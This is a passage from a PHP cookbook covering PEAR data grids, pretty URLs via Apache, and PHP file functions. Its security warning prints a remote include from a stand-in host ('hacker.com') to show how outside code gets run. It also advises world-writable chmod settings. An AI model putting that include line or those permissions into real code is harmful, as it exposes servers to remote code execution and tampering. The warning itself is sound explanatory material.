    We then instantiate our Structures_DataGrid object and create a series of Structures_DataGrid_Column objects, each of which represents a display column. We add them to our grid object using the addColumn method:

    pearDataGridCustom.php (excerpt)

        $datagrid = new Structures_DataGrid(2);
        $thumb = new Structures_DataGrid_Column("", "thumb",
            "thumb", null, null, "getThumbnail()");
        $datagrid->addColumn($thumb);
        $name = new Structures_DataGrid_Column("Name", "name",
            "first_name", null, null, "getName()");
        $datagrid->addColumn($name);
        $email = new Structures_DataGrid_Column("E-Mail", "email",
            "email");
        $datagrid->addColumn($email);
        $login = new Structures_DataGrid_Column("Login Name", "login",
            "login");
        $datagrid->addColumn($login);
  • 160.
        $sig = new Structures_DataGrid_Column("Signature", "signature",
            "signature");
        $datagrid->addColumn($sig);
        $datagrid->setDefaultSort(array('first_name' => 'ASC'));

    We also set the default ordering of the data so that it’s arranged by first name, in ascending (alphabetical) order. The code skeleton for the Structures_DataGrid_Column constructor is shown below:

        Structures_DataGrid_Column(
            string $label,
            [string $field = null],
            [string $orderBy = null],
            [array $attributes = array()],
            [string $autoFillValue = null],
            [mixed $formatter = null],
            [array $formatterArgs = array()]
        );

    Our custom column code above shows two important features: the custom formatter functions for the $thumb and $name columns (specified in their last arguments), and the orderBy argument for the $name column. In the case of the $name column, the orderBy argument is important because when we concatenate the two names together, we can no longer sort by one or the other. As such, we have to supply either a column name or an expression on which to sort. In our solution, we’ve chosen to sort by the first name.

    Next, we bind the grid to the SQL query using the bind method:

    pearDataGridCustom.php (excerpt)

        $options = array(
            'dsn' => "mysql://$user:$password@$db_host/$db_name");
        $sql = "SELECT DISTINCT * FROM user" .
            " LEFT JOIN user_images" .
            " ON user.id = user_images.user_id";
        $bind = $datagrid->bind($sql, $options);
        if (PEAR::isError($bind))
  • 161.
        {
          error_log('DataGrid Error: ' . $bind->getMessage());
          $gridsource = '';
        }

    We pass database information in the $options array so that our Structures_DataGrid object will be able to automatically choose the correct database driver to use and make a connection.

    We check for errors generated from the bind method call using the PEAR::isError method, and if we detect an error, we make sure to log it and set our $gridsource variable to an empty string. This ensures that the displayed web page will not contain any cryptic error messages.

    If no errors arise, we can proceed to customize the appearance of our grid. We add new icons to show the ordering direction, set custom colors for the header row and the alternate row color, and specify some custom table attributes:

    pearDataGridCustom.php (excerpt)

        else
        {
          $renderer_options = array(
              'sortIconASC' => '<img src="images/up.gif" />',
              'sortIconDESC' => '<img src="images/down.gif" />',
              'headerAttributes' => array('bgcolor' => '#E3E3E3'),
              'evenRowAttributes' => array('bgcolor' => '#A6A6A6'),
          );
          $datagrid->setRendererOptions($renderer_options);
          $renderer = $datagrid->getRenderer();
          $renderer->setTableAttribute('cellspacing', 0);
          $renderer->setTableAttribute('cellpadding', 5);
          $renderer->setTableAttribute('border', 1);

    We then retrieve the HTML source of our grid and pager using the getOutput method, and store it in the $gridsource variable:
  • 162.
pearDataGridCustom.php (excerpt)

        $gridbody = $datagrid->getOutput();
        if (PEAR::isError($gridbody))
        {
            error_log('DataGrid render error: ' . $gridbody->getMessage());
            $gridbody = '';
        }
        // Finally, render the pager, again checking for errors
        $gridpager = $datagrid->getOutput(DATAGRID_RENDER_PAGER);
        if (PEAR::isError($gridpager))
        {
            error_log('DataGrid render error: ' . $gridpager->getMessage());
            $gridpager = '';
        }
        $gridsource = $gridbody . $gridpager;
    }
    ?>

When we call the getOutput method, we make sure to test the return value for errors and take appropriate action.

Finally, our grid can be output in a web page:

pearDataGridCustom.php (excerpt)

    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
        "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    <html xmlns="http://www.w3.org/1999/xhtml">
      <head>
        ⋮ HTML head contents…
      </head>
      <body>
        <h1>PEAR::Structures_DataGrid, Customized!</h1>
        <?php echo $gridsource ?>
      </body>
    </html>

We can see the resulting output in Figure 5.5.
  • 163.
Figure 5.5. The customized data grid

How do I make “pretty” URLs in PHP?

One of the first things every PHP developer learns is the concept of GET, or query string, arguments: the variables attached to the end of a URL, which allow the sending of arbitrary data to your PHP script. However, it quickly becomes apparent that URLs with lots of query string arguments are quite ugly.

In years past there has been much talk about the importance of creating search engine friendly URLs, but in reality, this is a myth: any modern spider (Google or Yahoo! for example) will index URLs that make use of query string arguments. The most compelling argument for the practice now is “pretty” URLs: URLs that are both human-readable and easily memorable. What would you prefer to see:

    http://example.org/index.php?action=edit&item=163&what=trackbacks

Or:

    http://example.org/edit/trackbacks/for/163-My-Example-Page

Pretty URLs most often consist of three types of elements: the action (/edit), the type of action (/trackbacks), and one or more key-value pairs (/for/163-My-Example-Page).
  • 164.
Solutions

Apache provides us with several options for creating pretty URLs: AcceptPathInfo, MultiViews, and mod_rewrite.

Pretty URLs with AcceptPathInfo

AcceptPathInfo is an Apache 2 directive that controls whether requests that have a path appended to a filename will be accepted or rejected.[14] If it’s enabled, the path information is made available to PHP in the $_SERVER['PATH_INFO'] variable. This facility is usually available to PHP because Apache allows the PHP interpreter module to specify that this option is turned on.

AcceptPathInfo lets us create URLs like this:

    http://example.org/index.php/edit/trackbacks/for/163-My-Example-Page

This is an improvement on the URL we saw above, but it’s still not entirely pretty, as it contains a filename that people must remember, and which is superfluous to the URL.

Pretty URLs with MultiViews

We can go part of the way to remedying the problem of URLs containing filenames by using AcceptPathInfo in conjunction with the MultiViews option.[15] MultiViews is used for content negotiation, which means that it can be used to send a French translation of a resource to browser clients set to prefer reading French, or a GIF version of an image to browser clients that prefer GIF over JPEG (or that cannot render JPEG images at all).

MultiViews offers the side-effect of allowing us to reference files without their extensions. We enable it using the following in an .htaccess file or in httpd.conf:

    Options MultiViews

We can now use the following URL:

    http://example.org/index/edit/trackbacks/for/163-My-Example-Page

[14] http://httpd.apache.org/docs/2.0/mod/core.html#acceptpathinfo
[15] http://httpd.apache.org/docs/2.0/content-negotiation.html
  • 165.
Now we’re getting something close to our ideal URL. We can obviously rename our PHP file from index.php to something a little more intuitive; for example, by naming it admin.php, we end up with this URL:

    http://example.org/admin/edit/trackbacks/for/163-My-Example-Page

Both of these options are supported by Apache by default, but your ability to set MultiViews in your .htaccess file will depend on your host. Even in this best-case scenario, though, we still end up with an unwanted element in our URL: the real filename, which makes this URL longer and harder to remember than one that doesn’t contain this element.

Pretty URLs with mod_rewrite

mod_rewrite provides us with a very powerful (and complex) system for getting the exact results we want. However, mod_rewrite is not part of the core Apache server, and while it’s enabled by default on most distributions (and included with the Apache Win32 binary), it may not be available on your server. That’s why this is not the be-all and end-all solution to the problem. The two solutions above are more portable than this one; however, the code we will use to deal with the paths in this solution will work with all three solutions.

To use mod_rewrite, we must place something like the following code in an .htaccess file in the web server’s root directory:

    RewriteEngine On
    RewriteCond %{REQUEST_FILENAME} !-f
    RewriteCond %{REQUEST_FILENAME} !-d
    RewriteRule !\.(js|ico|gif|jpg|css)$ /index.php [L]

The two RewriteCond statements check that the incoming request doesn’t refer to an existing file or directory. If that’s true, the RewriteRule statement will rewrite the incoming request to a request for /index.php, as long as the request does not end in one of the listed filename extensions.

Once this code is in place, we can create our ideal URL:

    http://example.org/edit/trackbacks/for/163-My-Example-Page
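Whichever of the three Apache options is in use, the PHP script ends up reading the requested path from one of two $_SERVER entries. The following is a minimal sketch of that lookup, not the book’s own code: the function name requestPathFrom is hypothetical, and the use of parse_url to discard a query string from REQUEST_URI is an assumption about how you might want such URLs handled.

```php
<?php
// Hypothetical helper: returns the pretty-URL path for any of the three setups.
// It takes the server array as a parameter so it can be tried without Apache.
function requestPathFrom(array $server)
{
    if (isset($server['PATH_INFO'])) {
        // AcceptPathInfo or MultiViews: Apache has already isolated the extra path.
        $path = $server['PATH_INFO'];
    } else {
        // mod_rewrite: REQUEST_URI holds the original URL, query string included,
        // so keep only the path component.
        $path = (string) parse_url($server['REQUEST_URI'], PHP_URL_PATH);
    }

    // Drop any trailing slash so "/edit/" and "/edit" are treated alike.
    return rtrim($path, '/');
}

// Example values standing in for $_SERVER under each setup.
echo requestPathFrom(array('PATH_INFO' => '/edit/trackbacks/')) . "\n";
echo requestPathFrom(array('REQUEST_URI' => '/edit/trackbacks/for/163?page=2')) . "\n";
```

In a real script the argument would simply be $_SERVER; passing an array in makes the behavior easy to check from the command line.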
  • 166.
Handling Pretty URLs

PHP makes the path information available in $_SERVER['PATH_INFO'] for the AcceptPathInfo or MultiViews solutions, and in $_SERVER['REQUEST_URI'] when using mod_rewrite. We can handle those paths using a simple PHP class that will extract the path information from the incoming request.

We’ll call the class RequestPath and give it a single private property, $parts, to hold all the parts of our request URLs:

RequestPath.class.php (excerpt)

    class RequestPath
    {
        private $parts = array();

The actual path parsing happens in the __construct method, which simply explodes the path on the forward slash (/) character and then proceeds to handle the first two path elements as special cases before dealing with the key-value pairs that follow them.

The first thing we do is grab the path and trim the trailing / character if there is one:

RequestPath.class.php (excerpt)

        public function __construct()
        {
            if (isset($_SERVER['PATH_INFO']))
            {
                $path = (substr($_SERVER['PATH_INFO'], -1) == "/") ?
                    substr($_SERVER['PATH_INFO'], 0, -1) :
                    $_SERVER['PATH_INFO'];
            }
            else
            {
                $path = (substr($_SERVER['REQUEST_URI'], -1) == "/") ?
                    substr($_SERVER['REQUEST_URI'], 0, -1) :
                    $_SERVER['REQUEST_URI'];
            }

Next, we split the path into an array on the / character. The first element we’ll consider to be the action, the second we’ll consider to be the type:
  • 167.
RequestPath.class.php (excerpt)

            $bits = explode("/", substr($path, 1));
            $parsed['action'] = array_shift($bits);
            $parsed[] = $parsed['action'];
            $parsed['type'] = array_shift($bits);
            $parsed[] = $parsed['type'];

The remaining elements we group into key-value pairs. If an odd number of elements remains, we simply place the last element on the end of our key-value array:

RequestPath.class.php (excerpt)

            $parts_size = sizeof($bits);
            if ($parts_size % 2 != 0)
            {
                $parts_size -= 1;
            }
            for ($i = 0; $i < $parts_size; $i+=2)
            {
                $parsed[$bits[$i]] = $bits[$i+1];
                $parsed[] = $bits[$i+1];
            }
            if (sizeof($bits) % 2 != 0)
            {
                $parsed[] = array_pop($bits);
            }

Finally, as the last step of our constructor method, we assign our assembled array of path elements to our class’s private $parts array:

RequestPath.class.php (excerpt)

            $this->parts = $parsed;
        }

We can make use of the __get, __set, and __isset magic methods in our RequestPath class, enabling users of the class to get, set, and test the path element values by using the key as if it were a class property, and keeping our class nice and simple:
  • 168.
RequestPath.class.php (excerpt)

        public function __get($key)
        {
            return $this->parts[$key];
        }
        public function __set($key, $value)
        {
            // The property is declared as $parts, so that is the name used here
            $this->parts[$key] = $value;
        }
        public function __isset($key)
        {
            return isset($this->parts[$key]);
        }
    }
    ?>

Using the code is even simpler. Imagine that the incoming request is:

    http://yourhostname/edit/trackbacks/for/163-My-Example-Page

We can access the path information by creating a new RequestPath object:

    <?php
    require_once 'RequestPath.class.php';
    $request = new RequestPath();
    echo "Request action: {$request->action}<br />";
    echo "Request type: {$request->type}<br />";
    echo "Request for: {$request->for}<br />";
    ?>

That code should output the following:

    Request action: edit<br />
    Request type: trackbacks<br />
    Request for: 163-My-Example-Page<br />

Discussion

Once we have pretty URLs set up and functioning, we can start to implement professional solution architectures such as the Model-View-Controller architecture, or
  • 169.
MVC.[16] Pretty URLs are fast becoming an essential requirement for popular sites and it’s important to think about your URLs carefully, and make them as memorable, or as “guessable”, as possible.

Summary

In this chapter, we’ve explored a number of ways to make building web forms and tables a whole lot easier, in order to free up our time to focus on the aspects of web development that matter. There’s some degree of commonality between every table and every form, yet our roles as developers involve handling the differences: we can automate the common ground, but we need to learn to handle the aspects that make each case unique. This chapter also gave us a chance to experiment with using the Apache web server and some simple PHP to apply pretty URLs in our web applications.

Together, tables, forms, and pretty URLs are common tasks in the working experience of any web developer. The goal of this chapter has been to highlight the aspects of development that we can automate, and to make it easier to handle the parts we can’t. Unfortunately, nothing but experience can make the job easy all the time!

[16] http://en.wikipedia.org/wiki/Model-view-controller
  • 171.
Chapter 6: Working with Files

Databases make great tools for storing information because they’re fast and, with the help of SQL, easy to navigate. Sometimes, though, you need to be able to access the data stored in a file, be it an image, configuration information, or even a web page on a remote server. PHP makes such work easy with its powerful collection of file functions. The only hard part is choosing the right tool for the job!

For the sake of demonstration, I’ve saved a copy of the printable version of Pax Dickinson’s article “Top 7 PHP Security Blunders!,”[1] which we’ll manipulate with PHP’s file functions. The file is saved as writeSecureScripts.html in this book’s code archive.

[1] http://www.sitepoint.com/article/php-security-blunders
  • 172.
A Word on Security

Before you run riot with PHP’s file functions, think carefully about what you’re doing: you will be making files from your operating system available on a web page that will be exposed to the Internet. Check and double-check the code that accesses files, and look for holes in your logic that might allow unwanted access to those files.

Be particularly careful when allowing files and directories to be identified via URLs, or to be uploaded or downloaded from your site. This warning also extends to PHP’s include statements, which can be used to execute scripts included from a remote web server, for example: include 'http://www.hacker.com/bad_script.txt';.

Because of the potential for danger, php.ini settings are available to turn off this functionality. Setting allow_url_fopen = Off disables the URL-aware fopen wrappers, so that remote files can no longer be opened via URLs. As of version 5.2, there’s also the allow_url_include setting, which does the same thing for the include, include_once, require, and require_once statements. If allow_url_fopen is turned off, allow_url_include is automatically turned off as well.

I’ll be highlighting the potential dangers with each solution so that, with care, you can learn to write secure code.

How do I read a local file?

There are as many ways to read a local file as you can think of. In this solution, we’ll discuss a few of the most popular approaches, but if you wish to continue investigating, check out the relevant manual page.[2]

Solutions

This section covers three options: reading a file as an array, reading a file as a string, and reading a file directly to the screen.

[2] http://www.php.net/filesystem/
  • 173.
Reading a File as an Array

First up is PHP’s file function, which reads a file into an array, using the newline character to indicate where a new array element should begin:

fileFunc.php (excerpt)

    <?php
    $file = file('writeSecureScripts.html');
    $lines = count($file);
    $alt = '';
    for ($i=0; $i<$lines; $i++)
    {
        $alt = ($alt == 'even') ? 'odd' : 'even';
        echo '<div class="' . $alt . '">';
        echo $i . ': ' . htmlspecialchars($file[$i]);
        echo "</div>\n";
    }
    ?>

Hey, presto! Up pops the file in a nicely formatted page so you can examine it line by line. We simply loop over the $file variable (an array) with our for loop, and display it as we wish.

One thing you may have noticed in the above code is that we used a ternary operator for the alternate row colors in the first line inside the for loop. A ternary operator takes three arguments and is a shortcut approach to writing a simple if statement. The basic syntax is as follows:

    (condition) ? value_if_true : value_if_false

The output of our work can be seen in Figure 6.1.
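To make the ternary shortcut concrete, here is a small sketch that runs the row-class toggle from the loop above twice: once with the ternary operator and once with the if statement it abbreviates. The variable names $classes, $altLong, and $classesLong are introduced only for this illustration.

```php
<?php
// Version 1: the ternary form used in the file-listing loop.
$alt = '';
$classes = array();
for ($i = 0; $i < 4; $i++) {
    $alt = ($alt == 'even') ? 'odd' : 'even';
    $classes[] = $alt;
}

// Version 2: the same toggle written out as a full if statement.
$altLong = '';
$classesLong = array();
for ($i = 0; $i < 4; $i++) {
    if ($altLong == 'even') {
        $altLong = 'odd';
    } else {
        $altLong = 'even';
    }
    $classesLong[] = $altLong;
}

echo implode(', ', $classes) . "\n";     // even, odd, even, odd
echo implode(', ', $classesLong) . "\n"; // even, odd, even, odd
```

Both loops produce the same sequence; the ternary form just packs the condition and both outcomes into a single assignment.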
  • 174.
Figure 6.1. Reading a local file as an array

Reading a File as a String

As of PHP 4.3, the function called file_get_contents reads a file straight into a string without breaking it up:

fileGetFunc.php (excerpt)

    <?php
    $file = file_get_contents('writeSecureScripts.html');
    $file = strip_tags($file);
    ?>
    <form>
    <textarea>
    <?php
    echo htmlspecialchars($file);
  • 175.
    ?>
    </textarea>
    </form>

The content of the file is now displayed in an HTML textarea stripped of all its HTML tags. The output is depicted in Figure 6.2.

Figure 6.2. Reading a local file as a string

Reading a File Directly to the Screen

Another way to read a local file is to use the readfile function, which fetches the content of the file and displays it directly on the screen:

readFileFunc.php (excerpt)

    <?php
    readfile('writeSecureScripts.html');
    ?>
  • 176.
This one line of code displays the file exactly as it was found: do not stop at go, do not collect $200. The output is shown in Figure 6.3.

Figure 6.3. Reading a local file directly to the screen

Discussion

readfile is a handy way to safeguard your files and bandwidth. By linking all the files on your web site through a script using the readfile function, you can prevent others from linking directly to them and potentially sapping your web site’s bandwidth.[3] This approach uses what’s commonly referred to as an “anti-leeching” script. If you bring an authentication system and/or HTTP referrer check into the mix, you’ll have a more secure system that helps ensure that only legitimate visitors to your site can access your files.

[3] For an example of how to prevent this kind of pilfering, see “How do I manage file downloads with PHP?”
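As a rough illustration of the idea, the sketch below routes downloads through a whitelist before handing the file to readfile. It is only an outline under stated assumptions: the function names resolveDownload and sendDownload, the 'article' key, and the shape of the $downloads array are all hypothetical, and a real anti-leeching script would add the authentication or referrer checks mentioned above.

```php
<?php
// Hypothetical whitelist: public name => file on disk.
$downloads = array(
    'article' => 'writeSecureScripts.html',
);

// Returns the file path for a requested name, or null if it is not whitelisted.
// Visitors never supply a path themselves, only a key into the whitelist.
function resolveDownload($name, array $downloads)
{
    if (is_string($name) && isset($downloads[$name])) {
        return $downloads[$name];
    }
    return null;
}

// Sends the file to the browser with readfile; returns false if nothing was sent.
function sendDownload($name, array $downloads)
{
    $path = resolveDownload($name, $downloads);
    if ($path === null || !is_readable($path)) {
        return false;
    }
    readfile($path);
    return true;
}
```

A page script could then call sendDownload with a value taken from the query string and show an error page whenever it returns false. Because the request carries only a name, a visitor cannot use it to reach files outside the list.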
  • 177.
How do I use file handles?

To use the file functions we saw in the previous solution, you simply need to point them at the file they have to read, using a path that’s relative to the PHP script that executes the function. However, the majority of PHP’s file functions use a slightly different mechanism to access a file, a mechanism that’s very similar to that used to connect to a database. The process uses the fopen function to “connect” and fclose to “disconnect.” The value returned from the fopen function is a PHP file pointer, also known as the handle of the file. Once we have a handle on a file, we can use it to perform a variety of operations on the file, including reading it, appending to it, modifying it, and so on.

Solutions

This simple example demonstrates how to open and close that “connection” to the file:

fileHandle.php (excerpt)

    <?php
    $location = 'writeSecureScripts.html';
    $fp = fopen($location, 'rb');
    ⋮ the file handle $fp is now available
    fclose($fp);
    ?>

When you use fopen to connect to a file, you must specify the path to the file and a mode in which the file is to be accessed (such as r for read-only). The b mode indicator indicates that the file is to be opened in binary mode. As is noted on the manual page for fopen,[4] binary mode should always be specified to ensure the portability of your code between operating systems. For more information on the various modes that are available, read the manual page.

Handling Small Files

Now that we have a file handle, let’s use it to read the file:

[4] http://www.php.net/fopen/
  • 178.
fileHandle.php (excerpt)

    <?php
    $location = 'writeSecureScripts.html';
    $fp = fopen($location, 'rb');
    $file_contents = fread($fp, filesize($location));
    fclose($fp);
    echo $file_contents;
    ?>

This example merely demonstrates file handles in action. Notice that when we use fread, the second argument reflects the amount of data, in bytes, that will be read from the start of the file. For this argument, I’ve used the filesize function, which tells me the total size of the file.

Handling Larger Files

The previous solution is fine for small files. However, when it’s reading all the contents of a large file, PHP will be forced to fill a lot of memory with those contents, possibly causing a performance issue. To alleviate the potential for this problem, we take a different approach to reading the contents of a large file: we read the file in chunks, and operate on each chunk as we go:

fileHandle2.php (excerpt)

    <?php
    $fp = fopen('writeSecureScripts.html', 'rb');
    while (!feof($fp))
    {
        $chunk = fgets($fp);
        echo $chunk;
    }
    fclose($fp);
    ?>

In our example, the file is opened as normal. Next, to read the contents of the file, we use a while loop, which continues so long as the feof function returns FALSE. feof returns TRUE if the end of the file has been reached, or if there’s an error with the file handle (such as a loss of connection, which can occur with remote files).
  • 179.
Next, we use fgets to fetch a “chunk” of the file, beginning at the current location and running to the next line-feed character. We get the string back, and fgets moves the internal PHP file pointer for the file handle forward accordingly.

Discussion

Many more functions are available for reading a file using a file handle. One is fgetss (note the double s), which is almost the same as fgets but strips out any HTML tags it finds in the same way the strip_tags function would. Another is fscanf, which parses input from the file according to a format string, using the same kind of format specifiers as printf. And let’s not forget fgetcsv, which makes handling CSV (comma-separated values) files a piece of cake. In an idle moment, it’s well worth browsing the file system functions for goodies.[5]

But if all you wish to do is read the entire contents of a file into a variable, the file and file_get_contents functions are easier to use, and offer potentially better performance.

How do I modify a local file?

Now that you’ve seen how to read the contents of a file and you’re acquainted with file handles, how about updating files? Again, it’s easy with PHP.

Solution

Take a look at this code:

write.php (excerpt)

    <?php
    $lines = file('writeSecureScripts.html');
    $fp = fopen('writeSecureScripts.txt', 'w');
    foreach ($lines as $line)
    {
        $line = strip_tags($line);
        fwrite($fp, $line);
    }
    fclose($fp);
    echo '<pre>';

[5] http://www.php.net/manual/en/ref.filesystem.php
  • 180.
    echo file_get_contents('writeSecureScripts.txt');
    echo '</pre>';
    ?>

We use the fwrite function to write a string to a file. Take note of the mode we used when we opened the new file with fopen. The mode w will open the file for writing, beginning at the very start of the file and overwriting anything that already exists. If we’d used a instead, the new contents would have been appended to the file, preserving the original contents. In either case, the file will be created if it doesn’t already exist.

For a fast, no-nonsense method for writing to a file, investigate the file_put_contents function.[6] It’s identical to calling fopen, fwrite, and fclose, as we saw in “How do I use file handles?”.

Discussion

Be aware that on a Unix-based web server, PHP will usually run as a user such as www or nobody, an account that has very limited permissions and isn’t owned specifically by you. Files that are created by PHP will need to be placed in a directory to which that user has write permissions.

To make a file or directory readable and writable by that user, use this command:

    chmod o=rw <directory | file>

If you need to execute the file as well (for instance, it’s a PHP script), use the following command:

    chmod o=rwx <directory | file>

Protecting Sensitive Files

If you use a shared server, making directories readable and writable like this means that other people with accounts on the server will be able to read and modify the contents of those directories. Be careful about the type of information you place in them! Your web host should be able to help you address any security concerns.

[6] http://www.php.net/file_put_contents/
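The file_put_contents shortcut mentioned in the solution above can stand in for both the w and a modes. The sketch below shows the two behaviors side by side; the log file name and its location in the system temporary directory are assumptions made so the example can run anywhere PHP has a writable temp directory.

```php
<?php
// Hypothetical scratch file in the system temp directory.
$logFile = sys_get_temp_dir() . '/anthology_example.log';

// With no flags, file_put_contents acts like mode "w":
// the file is created if needed and any existing contents are replaced.
file_put_contents($logFile, "first line\n");

// FILE_APPEND acts like mode "a" and keeps what is already there.
// LOCK_EX asks for an exclusive lock while the write takes place.
file_put_contents($logFile, "second line\n", FILE_APPEND | LOCK_EX);

echo file_get_contents($logFile);
```

Each call opens, writes, and closes the file in one step, so there is no handle to forget to close.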
  • 181.
How do I access information about a local file?

PHP comes with a range of functions to help you obtain information about a file.

Solution

In the following example, we use a number of handy functions:

■ file_exists, to check whether the file exists
■ is_file, to check that the file is indeed a file and not a directory
■ is_readable, to check whether the file can be read
■ is_writable, to check whether the file can be written to
■ filemtime, to find the date and time at which the file was last modified
■ fileatime, to find the date and time at which the file was last accessed
■ filesize, to check the file’s size

We also wrap the result in some custom code to make it more readable:

fileInfo.php (excerpt)

    <?php
    // Function to convert a size in bytes to larger units
    function fileSizeUnit($size)
    {
        if ($size >= 1073741824)
        {
            $size = number_format(($size / 1073741824), 2);
            $unit = 'GB';
        }
        else if ($size >= 1048576)
        {
            $size = number_format(($size / 1048576), 2);
            $unit = 'MB';
        }
        else if ($size >= 1024)
        {
            $size = number_format(($size / 1024), 2);
            $unit = 'KB';
        }
        else if ($size >= 0)
  • 182.
        {
            $unit = 'B';
        }
        else
        {
            $size = '0';
            $unit = 'B';
        }
        return array('size' => $size, 'unit' => $unit);
    }

    $file = 'writeSecureScripts.html';

    // set the default timezone to use. Available since PHP 5.1
    // needed otherwise date() throws an E_STRICT error in v5.2
    date_default_timezone_set('UTC');

    // Does the file exist
    if (file_exists($file))
    {
        echo 'Yep: ' . $file . ' exists.<br />';
    }
    else
    {
        die('Where has: ' . $file . ' gone!<br />');
    }

    // Is it a file? Could be is_dir() for directory
    if (is_file($file))
    {
        echo $file . ' is a file<br />';
    }

    // Is it readable
    if (is_readable($file))
    {
        echo $file . ' can be read<br />';
    }

    // Is it writable
    if (is_writable($file))
    {
        echo $file . ' can be written to<br />';
    }
  • 183.
    // When was it last modified?
    $modified = date("D d M g:i:s", filemtime($file));
    echo $file . ' last modified at ' . $modified . '<br />';

    // When was it last accessed?
    $accessed = date("D d M g:i:s", fileatime($file));
    echo $file . ' last accessed at ' . $accessed . '<br />';

    // Use a more convenient file size
    $size = fileSizeUnit(filesize($file));

    // Display the file size (the apostrophe must be escaped inside single quotes)
    echo 'It\'s ' . $size['size'] . ' ' . $size['unit'] . ' in size.<br />';
    ?>

Discussion

The fileSizeUnit function we used at the start of this code helps to make the result of PHP’s filesize function more readable.

PHP keeps a cache of the results of file information functions to improve performance. Sometimes, though, it will be necessary to clear that cache; we do so using the clearstatcache function.

The output of the code above can be seen in Figure 6.4.

Figure 6.4. Retrieving file information
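The situation where clearstatcache matters is a script that asks about a file, changes it, and then asks again. The sketch below walks through that sequence; the scratch file name and its location in the temporary directory are assumptions for the sake of a runnable example.

```php
<?php
// Hypothetical scratch file in the system temp directory.
$file = sys_get_temp_dir() . '/anthology_statcache.txt';

// Start with a three-byte file and ask for its size.
// PHP may remember this answer for later calls on the same file.
file_put_contents($file, 'abc');
$before = filesize($file);

// Grow the file by five bytes through a file handle.
$fp = fopen($file, 'ab');
fwrite($fp, 'defgh');
fclose($fp);

// Discard any remembered file information before asking again,
// so that the second answer reflects the file as it is now.
clearstatcache();
$after = filesize($file);

echo "Before: $before bytes, after: $after bytes\n";
```

Calling clearstatcache before the second filesize call is the cautious choice whenever the same script both modifies and inspects a file.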
  • 184.
How do I examine directories with PHP?

When you’re creating web-based file managers in PHP, it’s handy to be able to explore the contents of directories.

Solutions

There are two basic approaches to examining directories with PHP; you should use whichever method you prefer.[7]

Using the readdir Function

The first approach, which uses the opendir, readdir, and closedir functions, is similar to the process of using fopen, fread, and fclose to read a file:

readdir.php (excerpt)

    <?php
    $location = './';
    $dp = opendir($location);
    // Compare against false explicitly: an entry named "0"
    // would otherwise be treated as the end of the listing
    while (false !== ($entry = readdir($dp)))
    {
        if (is_dir($location . $entry))
        {
            echo '[Dir] ' . $entry . '<br />';
        }
        else if (is_file($location . $entry))
        {
            echo '[File] ' . $entry . '<br />';
        }
    }
    closedir($dp);
    ?>

[7] We’ll discuss a third option later in “How do I work with files using the Standard PHP Library in PHP 5?”
  • 185.
Using the dir Pseudo-Class

The alternative approach is to use the dir pseudo-class.[8] dir is used in a very similar way to readdir:

readdir2.php (excerpt)

    <?php
    $location = './';
    $dir = dir($location);
    // Compare against false explicitly so that an entry named "0"
    // does not end the loop early
    while (false !== ($entry = $dir->read()))
    {
        if (is_dir($location . $entry))
        {
            echo '[Dir] ' . $entry . '<br />';
        }
        else if (is_file($location . $entry))
        {
            echo '[File] ' . $entry . '<br />';
        }
    }
    $dir->close();
    ?>

How do I display PHP source code online?

Sometimes, you might want to display the source of a file. Maybe you’re making the code publicly available, but you don’t want to handle downloads. Or you don’t want to continually update the display page so it remains synchronized with the actual code (after all, you may be continually improving it). As it turns out, being a bit lazy isn’t a crime after all.

Solution

PHP provides a very handy function for displaying code: highlight_string, which displays PHP code in a presentable manner using the formatting defined in php.ini.

[8] dir defines the Directory class, one of the predefined classes that are built into PHP. You can read more about predefined classes on the manual page at http://www.php.net/manual/en/reserved.classes.php.
  • 186.
Displaying code is even easier with the partner to this function, highlight_file, which can simply be passed the name of the file you want to display:

highlight.php (excerpt)

    <?php
    // Define an array of allowed files - VERY IMPORTANT!
    $allowed = array('fileInfo.php', 'fileGetFunc.php',
        'fileHandle.php', 'fileHandle2.php');
    if (isset($_GET['view']) && in_array($_GET['view'], $allowed))
    {
        highlight_file($_GET['view']);
    }
    else
    {
        $location = './';
        $dir = dir($location);
        while (false !== ($entry = $dir->read()))
        {
            if (in_array($entry, $allowed))
            {
                // Escape PHP_SELF, as it can contain visitor-supplied text
                echo '<a href="' . htmlspecialchars($_SERVER['PHP_SELF']) .
                    '?view=' . $entry . '">' . $entry . "</a><br />\n";
            }
        }
        $dir->close();
    }
    ?>

In PHP 4.2.0 or later, if you pass a second argument of TRUE to highlight_string or highlight_file, the function will return the results as a string rather than displaying the file directly.

The output from highlight.php is shown in Figure 6.5.
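The return-as-string behavior is useful when the highlighted code has to be placed inside a larger page template. Here is a brief sketch of that usage; the $snippet contents and the surrounding div with its class name are made up for the example.

```php
<?php
// A small piece of PHP source to highlight (contents are illustrative only).
$snippet = '<?php echo "Hello"; ?>';

// Passing TRUE as the second argument makes highlight_string
// return the generated HTML instead of printing it.
$html = highlight_string($snippet, true);

// The markup can now be placed wherever the page layout needs it.
echo '<div class="source">' . $html . '</div>';
```

The same second argument works with highlight_file, which would let the whitelisted viewer above wrap its output in the site’s own layout.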
  • 187.
Figure 6.5. Displaying PHP source code

Discussion

I take care to allow access only to specified files when I’m displaying either directory contents, or individual file sources. It’s important to be extremely cautious about the way you display your source code, or you may find yourself giving away more than you expected, such as the usernames and passwords used to access a database.

Note that hiding code in the interests of security is not what I’m advocating here. Code should be written to be secure in the first place. Hiding code so that no one discovers the holes in it is a recipe for disaster. Eventually someone will find out what you’ve been hiding and, worse still, you’ll probably be ignorant of the fact that they’re exploiting your lax security.

How do I store configuration information in a file?

Certain information that’s used repeatedly throughout your site (such as passwords, paths, and variables) is best stored in a single file. That way, should you need to move your code to another site, you’ll be able to modify the settings once, rather than hundreds of times throughout your code.
  • 188.
Solution

The easiest way to store configuration information is to create the variables in an .ini file, then include this file in your code using the parse_ini_file function, which parses files that use the same format as php.ini. Here’s an example .ini file:

example.ini (excerpt)

    ; Settings to connect to MySQL
    [Database_Settings]
    host=localhost
    user=littleme
    pass=secret
    dbname=world

    ; Default locations of various files
    [Locations]
    css=/home/littleme/myinc/css
    javascript=/home/littleme/myinc
    images=/home/littleme/image

This script uses the parse_ini_file function to retrieve values from your .ini file:

parseini.php (excerpt)

    <?php
    $iniVars = parse_ini_file('example.ini', TRUE);
    echo '<pre>';
    print_r($iniVars);
    echo $iniVars['Locations']['css'];
    echo '</pre>';
    ?>

And here’s the output of the script:

    Array
    (
        [Database_Settings] => Array
            (
                [host] => localhost
                [user] => littleme
                [pass] => secret
  • 189.
                [dbname] => world
            )
        [Locations] => Array
            (
                [css] => /home/littleme/myinc/css
